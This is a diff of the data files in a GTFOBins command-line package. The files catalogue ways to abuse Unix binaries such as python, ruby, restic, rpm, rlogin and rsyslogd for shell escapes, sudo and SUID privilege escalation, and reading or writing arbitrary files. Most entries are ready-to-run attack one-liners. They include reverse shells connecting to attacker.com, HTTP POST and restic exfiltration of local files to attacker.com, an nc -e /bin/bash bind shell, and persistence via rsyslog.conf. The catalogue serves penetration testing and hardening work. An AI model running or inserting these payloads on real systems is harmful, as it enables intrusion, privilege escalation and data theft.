gtfobins-cli 1.0.0__py3-none-any.whl → 1.1.0__py3-none-any.whl

gtfo/data/python.json

@@ -1,62 +1,68 @@
 {
-  "description": "The payloads are compatible with both Python version 2 and 3.",
   "functions": {
     "shell": [
       {
-        "code": "python -c 'import os; os.system(\"/bin/sh\")'"
+        "description": "",
+        "code": "python -c 'import os; os.system(\"/bin/sh\")'\n"
       }
     ],
     "reverse-shell": [
       {
-        "description": "Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
-        "code": "python -c 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")'\n"
+        "description": "Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\npython -c 'import sys,socket,os,pty;s=socket.socket()\ns.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")'\n"
       }
     ],
     "file-upload": [
       {
-        "description": "Send local file via 'd' parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
-        "code": "python -c 'import sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))'\n"
+        "description": "Send local file via \"d\" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "export URL=http://attacker.com/\nexport LFILE=file_to_send\npython -c 'import sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(e[\"URL\"], bytes(u.urlencode({\"d\":open(e[\"LFILE\"]).read()}).encode()))'\n"
       },
       {
         "description": "Serve files in the local folder running an HTTP server.",
-        "code": "python -c 'import sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()'\n"
+        "code": "export LPORT=8888\npython -c 'import sys; from os import environ as e\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", int(e[\"LPORT\"])), s.SimpleHTTPRequestHandler).serve_forever()'\n"
       }
     ],
     "file-download": [
       {
         "description": "Fetch a remote file via HTTP GET request.",
-        "code": "python -c 'import sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[url]\", \"[file]\")'\n"
+        "code": "export URL=http://attacker.com/file_to_get\nexport LFILE=file_to_save\npython -c 'import sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(e[\"URL\"], e[\"LFILE\"])'\n"
       }
     ],
     "file-write": [
       {
-        "code": "python -c 'open(\"[file]\",\"w+\").write(\"DATA\")'"
+        "description": "",
+        "code": "python -c 'open(\"file_to_write\",\"w+\").write(\"DATA\")'\n"
       }
     ],
     "file-read": [
       {
-        "code": "python -c 'print(open(\"[file]\").read())'"
+        "description": "",
+        "code": "python -c 'print(open(\"file_to_read\").read())'\n"
       }
     ],
     "library-load": [
       {
-        "code": "python -c 'from ctypes import cdll; cdll.LoadLibrary(\"lib.so\")'"
+        "description": "",
+        "code": "python -c 'from ctypes import cdll; cdll.LoadLibrary(\"lib.so\")'\n"
       }
     ],
     "suid": [
       {
-        "code": "./python -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'"
+        "description": "",
+        "code": "./python -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo python -c 'import os; os.system(\"/bin/sh\")'"
+        "description": "",
+        "code": "sudo python -c 'import os; os.system(\"/bin/sh\")'\n"
       }
     ],
     "capabilities": [
       {
-        "code": "./python -c 'import os; os.setuid(0); os.system(\"/bin/sh\")'"
+        "description": "",
+        "code": "./python -c 'import os; os.setuid(0); os.system(\"/bin/sh\")'\n"
       }
     ]
   }
-}
+}

gtfo/data/qpdf.json

@@ -0,0 +1,18 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "qpdf --empty --add-attachment /path/filename -- out.pdf; qpdf out.pdf --show-attachment=filename"
+      },
+      {
+        "description": "`qpdf` can be used to read any arbitrary file accessible to the running user, by attaching the target file to a valid PDF file, and then accessing that attachment. If the user is allowed to run `qpdf` as an elevated user (e.g with `sudo`), privileged files can be read.",
+        "code": "FILE_TO_READ=\"/path/to/file\"\nqpdf --qdf --add-attachment $FILE_TO_READ --key=anykey -- valid.pdf output.pdf\nqpdf --show-attachment=anykey output.pdf"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo qpdf --empty --add-attachment /path/filename -- out.pdf; qpdf out.pdf --show-attachment=filename"
+      }
+    ]
+  }
+}

gtfo/data/r.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "",
+        "code": "R --no-save -e 'system(\"sh\")'\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "",
+        "code": "sudo R --no-save -e 'system(\"sh\")'\n"
+      }
+    ]
+  }
+}

gtfo/data/rake.json

@@ -1,19 +1,28 @@
 {
   "functions": {
+    "file-read": [
+      {
+        "description": "The file is actually parsed and the first wrong line is returned in an error message.",
+        "code": "LFILE=file-to-read\nrake -f $LFILE\n"
+      }
+    ],
     "shell": [
       {
-        "code": "rake -p '`/bin/sh 1>&0`'"
+        
+        "code": "rake -p '`/bin/sh 1>&0`'\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo rake -p '`/bin/sh 1>&0`'"
+        
+        "code": "sudo rake -p '`/bin/sh 1>&0`'\n"
       }
     ],
     "limited-suid": [
       {
-        "code": "./rake -p '`/bin/sh 1>&0`'"
+        
+        "code": "./rake -p '`/bin/sh 1>&0`'\n"
       }
     ]
   }
-}
+}

gtfo/data/rc.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "rc -c '/bin/sh'\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "./rc -c '/bin/sh -p'\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo rc -c '/bin/sh'\n"
+      }
+    ]
+  }
+}

gtfo/data/readelf.json

@@ -1,20 +1,22 @@
 {
-  "description": "Each line is corrupted by a prefix string and wrapped inside single quotes. Also consider that lines are actually parsed as `readelf` options thus some file contents may lead to unexpected results.\n",
   "functions": {
     "file-read": [
       {
-        "code": "readelf -a @[file]\n"
+        
+        "code": "LFILE=file_to_read\nreadelf -a @$LFILE\n"
       }
     ],
     "suid": [
       {
-        "code": "./readelf -a @[file]\n"
+        
+        "code": "LFILE=file_to_read\n./readelf -a @$LFILE\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo readelf -a @[file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo readelf -a @$LFILE\n"
       }
     ]
   }
-}
+}

gtfo/data/red.json

@@ -1,20 +1,22 @@
 {
-  "description": "Read and write files limited to the current directory.",
   "functions": {
     "file-write": [
       {
-        "code": "red [file]\na\nDATA\n.\nw\nq\n"
+        
+        "code": "red file_to_write\na\nDATA\n.\nw\nq\n"
       }
     ],
     "file-read": [
       {
-        "code": "red [file]\n,p\nq\n"
+        
+        "code": "red file_to_read\n,p\nq\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo red [file]\na\nDATA\n.\nw\nq\n"
+        
+        "code": "sudo red file_to_write\na\nDATA\n.\nw\nq\n"
       }
     ]
   }
-}
+}

gtfo/data/redcarpet.json

@@ -1,15 +1,16 @@
 {
-  "description": "The file is actually parsed as a Markdown file.",
   "functions": {
     "file-read": [
       {
-        "code": "redcarpet \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nredcarpet \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo redcarpet \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nsudo redcarpet \"$LFILE\"\n"
       }
     ]
   }
-}
+}

gtfo/data/redis.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "file-write": [
+      {
+        "description": "Write files on the server running Redis at the specified location. Written data will appear amongst the database dump, thus it might not be suitable for all kind of purposes.",
+        "code": "IP=127.0.0.1\nredis-cli -h $IP\nconfig set dir dir_to_write_to\nconfig set dbfilename file_to_write\nset x \"DATA\"\nsave\n"
+      }
+    ]
+  }
+}

gtfo/data/restic.json

@@ -1,20 +1,28 @@
 {
-  "description": "The attacker must setup a server to receive the backups, in the following example https://github.com/restic/rest-server/ is used but there are other options. To start a new instance and create a new repository:\n\n./rest-server --listen \":[port]\"\nrestic init -r \"rest:http://localhost:[port]/[file]\"\n\nTo extract the data from the restic repository in the current directory on the attacker side:\n\nrestic restore -r \"/tmp/restic/[file]\" latest --target .\n\nUpload data to the attacker server with the following commands.\n",
   "functions": {
+    "command": [
+      {
+        "description": "The attacker does not need to setup a server to receive the backups in this case. Command execution can be achieved through control of argv or environment, many restic subcommands support this option, so even if the attacker control only a subset of argv, command execution may still be achievable.",
+        "code": "RESTIC_PASSWORD_COMMAND='nc -l 127.0.0.1 -p 4321 -e /bin/bash' restic backup # Through environment\nrestic backup --password-command=\"nc -l 127.0.0.1 -p 4321 -e /bin/bash\"      # Through option\n"
+      }
+    ],
     "file-upload": [
       {
-        "code": "restic backup -r \"rest:http://[host]:[port]/[backup]\" \"[file]\"\n"
+        "description": "",
+        "code": "RHOST=attacker.com\nRPORT=12345\nLFILE=file_or_dir_to_get\nNAME=backup_name\nrestic backup -r \"rest:http://$RHOST:$RPORT/$NAME\" \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo restic backup -r \"rest:http://[host]:[port]/[backup]\" \"[file]\"\n"
+        "description": "",
+        "code": "RHOST=attacker.com\nRPORT=12345\nLFILE=file_or_dir_to_get\nNAME=backup_name\nsudo restic backup -r \"rest:http://$RHOST:$RPORT/$NAME\" \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./restic backup -r \"rest:http://[host]:[port]/[backup]\" \"[file]\"\n"
+        "description": "",
+        "code": "RHOST=attacker.com\nRPORT=12345\nLFILE=file_or_dir_to_get\nNAME=backup_name\n./restic backup -r \"rest:http://$RHOST:$RPORT/$NAME\" \"$LFILE\"\n"
       }
     ]
   }
-}
+}

gtfo/data/rev.json

@@ -2,17 +2,20 @@
   "functions": {
     "file-read": [
       {
-        "code": "rev [file] | rev\n"
+        
+        "code": "LFILE=file_to_read\nrev $LFILE | rev\n"
       }
     ],
     "suid": [
       {
-        "code": "./rev [file] | rev\n"
+        
+        "code": "LFILE=file_to_read\n./rev $LFILE | rev\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo rev [file] | rev\n"
+        
+        "code": "LFILE=file_to_read\nsudo rev $LFILE | rev\n"
       }
     ]
   }

gtfo/data/rlogin.json

@@ -1,11 +1,10 @@
 {
-  "description": "Usually 'rlogin' is a symlink to 'ssh' the following works only when the real 'rlogin' is used (e.g., from the 'rsh-client' APT package).",
   "functions": {
     "file-upload": [
       {
-        "description": "Send contents of a file to a TCP port. Run 'nc -l -p [port] > [file]' on the attacker system to capture the contents. 'rlogin' hangs waiting for the remote peer to close the socket. The file is corrupted by leading and trailing spurious data.",
-        "code": "rlogin -l \"$(cat [file])\" -p [port] [host]\n"
+        "description": "Send contents of a file to a TCP port. Run `nc -l -p 12345 > \"file_to_save\"` on the attacker system to capture the contents.\n\n`rlogin` hangs waiting for the remote peer to close the socket.\n\nThe file is corrupted by leading and trailing spurious data.\n",
+        "code": "RHOST=attacker.com\nRPORT=12345\nLFILE=file_to_send\nrlogin -l \"$(cat $LFILE)\" -p $RPORT $RHOST\n"
       }
     ]
   }
-}
+}

gtfo/data/rlwrap.json

@@ -2,24 +2,27 @@
   "functions": {
     "shell": [
       {
-        "code": "rlwrap /bin/sh"
+        
+        "code": "rlwrap /bin/sh\n"
       }
     ],
     "file-write": [
       {
-        "description": "This adds timestamps to the output file. This relies on the external 'echo' command.",
-        "code": "rlwrap -l [file] echo DATA\n"
+        "description": "This adds timestamps to the output file. This relies on the external `echo` command.",
+        "code": "LFILE=file_to_write\nrlwrap -l \"$LFILE\" echo DATA\n"
       }
     ],
     "suid": [
       {
-        "code": "./rlwrap -H /dev/null /bin/sh -p"
+        
+        "code": "./rlwrap -H /dev/null /bin/sh -p\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo rlwrap /bin/sh"
+        
+        "code": "sudo rlwrap /bin/sh\n"
       }
     ]
   }
-}
+}

gtfo/data/rpm.json

@@ -2,23 +2,27 @@
   "functions": {
     "shell": [
       {
-        "code": "rpm --eval '%{lua:os.execute(\"/bin/sh\")}'"
+        
+        "code": "rpm --eval '%{lua:os.execute(\"/bin/sh\")}'\n"
       },
       {
-        "code": "rpm --pipe '/bin/sh 0<&1'"
+        
+        "code": "rpm --pipe '/bin/sh 0<&1'\n"
       }
     ],
     "limited-suid": [
       {
-        "code": "./rpm --eval '%{lua:os.execute(\"/bin/sh\")}'"
+        
+        "code": "./rpm --eval '%{lua:os.execute(\"/bin/sh\")}'\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo rpm --eval '%{lua:os.execute(\"/bin/sh\")}'"
+        
+        "code": "sudo rpm --eval '%{lua:os.execute(\"/bin/sh\")}'\n"
       },
       {
-        "description": "It runs commands using a specially crafted RPM package. Generate it with 'https://github.com/jordansissel/fpm' and upload it to the target.\n```\nTF=$(mktemp -d)\necho 'id' > $TF/x.sh\nfpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF\n```",
+        "description": "It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n```\nTF=$(mktemp -d)\necho 'id' > $TF/x.sh\nfpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF\n```\n",
         "code": "sudo rpm -ivh x-1.0-1.noarch.rpm\n"
       }
     ]

gtfo/data/rpmdb.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "rpmdb --eval '%(/bin/sh 1>&2)'\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        
+        "code": "./rpmdb --eval '%(/bin/sh 1>&2)'\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo rpmdb --eval '%(/bin/sh 1>&2)'\n"
+      }
+    ]
+  }
+}

gtfo/data/rpmquery.json

@@ -2,17 +2,20 @@
   "functions": {
     "shell": [
       {
-        "code": "rpmquery --eval '%{lua:posix.exec(\"/bin/sh\")}'"
+        
+        "code": "rpmquery --eval '%{lua:posix.exec(\"/bin/sh\")}'\n"
       }
     ],
     "limited-suid": [
       {
-        "code": "./rpmquery --eval '%{lua:os.execute(\"/bin/sh\")}'"
+        
+        "code": "./rpmquery --eval '%{lua:os.execute(\"/bin/sh\")}'\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo rpmquery --eval '%{lua:posix.exec(\"/bin/sh\")}'"
+        
+        "code": "sudo rpmquery --eval '%{lua:posix.exec(\"/bin/sh\")}'\n"
       }
     ]
   }

gtfo/data/rpmverify.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "rpmverify --eval '%(/bin/sh 1>&2)'\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        
+        "code": "./rpmverify --eval '%(/bin/sh 1>&2)'\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo rpmverify --eval '%(/bin/sh 1>&2)'\n"
+      }
+    ]
+  }
+}

gtfo/data/rsync.json

@@ -2,18 +2,21 @@
   "functions": {
     "shell": [
       {
-        "code": "rsync -e 'sh -c \"sh 0<&2 1>&2\"' 127.0.0.1:/dev/null"
+        
+        "code": "rsync -e 'sh -c \"sh 0<&2 1>&2\"' 127.0.0.1:/dev/null\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo rsync -e 'sh -c \"sh 0<&2 1>&2\"' 127.0.0.1:/dev/null"
+        
+        "code": "sudo rsync -e 'sh -c \"sh 0<&2 1>&2\"' 127.0.0.1:/dev/null\n"
       }
     ],
     "suid": [
       {
-        "code": "./rsync -e 'sh -p -c \"sh 0<&2 1>&2\"' 127.0.0.1:/dev/null"
+        
+        "code": "./rsync -e 'sh -p -c \"sh 0<&2 1>&2\"' 127.0.0.1:/dev/null\n"
       }
     ]
   }
-}
+}

gtfo/data/rsyslogd.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "reverse-shell": [
+      {
+        "description": "After placing an executable or shell script on disk, you can trigger its execution via a logging facility by adding one line to the rsyslog.conf file",
+        "code": ":msg, contains, \"randomstringtomatch\" ^/path/to/script.sh\n"
+      }
+    ],
+    "bind-shell": [
+      {
+        "description": "After placing an executable or shell script on disk, you can trigger its execution via a logging facility by adding one line to the rsyslog.conf file",
+        "code": ":msg, contains, \"randomstringtomatch\" ^/path/to/script.sh\n"
+      }
+    ]
+  }
+}

gtfo/data/rtorrent.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "echo \"execute = /bin/sh,-c,\\\"/bin/sh <$(tty) >$(tty) 2>$(tty)\\\"\" >~/.rtorrent.rc\nrtorrent\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "echo \"execute = /bin/sh,-p,-c,\\\"/bin/sh -p <$(tty) >$(tty) 2>$(tty)\\\"\" >~/.rtorrent.rc\n./rtorrent\n"
+      }
+    ]
+  }
+}

gtfo/data/ruby.json

@@ -2,51 +2,57 @@
   "functions": {
     "shell": [
       {
-        "code": "ruby -e 'exec \"/bin/sh\"'"
+        
+        "code": "ruby -e 'exec \"/bin/sh\"'\n"
       }
     ],
     "reverse-shell": [
       {
-        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
-        "code": "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"[host]\",\"[port]\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'\n"
+        "description": "Run `nc -l -p 12345` on the attacker box to receive the shell.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV[\"RHOST\"],ENV[\"RPORT\"]);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'\n"
       }
     ],
     "file-upload": [
       {
         "description": "Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.",
-        "code": "ruby -run -e httpd . -p [port]\n"
+        "code": "export LPORT=8888\nruby -run -e httpd . -p $LPORT\n"
       }
     ],
     "file-download": [
       {
         "description": "Fetch a remote file via HTTP GET request.",
-        "code": "ruby -e 'require \"open-uri\"; IO.copy_stream(open(\"[url]\"), \"[file]\")'\n"
+        "code": "export URL=http://attacker.com/file_to_get\nexport LFILE=file_to_save\nruby -e 'require \"open-uri\"; download = open(ENV[\"URL\"]); IO.copy_stream(download, ENV[\"LFILE\"])'\n"
       }
     ],
     "file-write": [
       {
-        "code": "ruby -e 'File.open(\"[file]\", \"w+\") { |f| f.write(\"DATA\") }'"
+        
+        "code": "ruby -e 'File.open(\"file_to_write\", \"w+\") { |f| f.write(\"DATA\") }'\n"
       }
     ],
     "file-read": [
       {
-        "code": "ruby -e 'puts File.read(\"[file]\")'"
+        
+        "code": "ruby -e 'puts File.read(\"file_to_read\")'\n"
       }
     ],
     "library-load": [
       {
-        "code": "ruby -e 'require \"fiddle\"; Fiddle.dlopen(\"lib.so\")'"
+        
+        "code": "ruby -e 'require \"fiddle\"; Fiddle.dlopen(\"lib.so\")'\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo ruby -e 'exec \"/bin/sh\"'"
+        
+        "code": "sudo ruby -e 'exec \"/bin/sh\"'\n"
       }
     ],
     "capabilities": [
       {
-        "code": "./ruby -e 'Process::Sys.setuid(0); exec \"/bin/sh\"'"
+        
+        "code": "./ruby -e 'Process::Sys.setuid(0); exec \"/bin/sh\"'\n"
       }
     ]
   }
-}
+}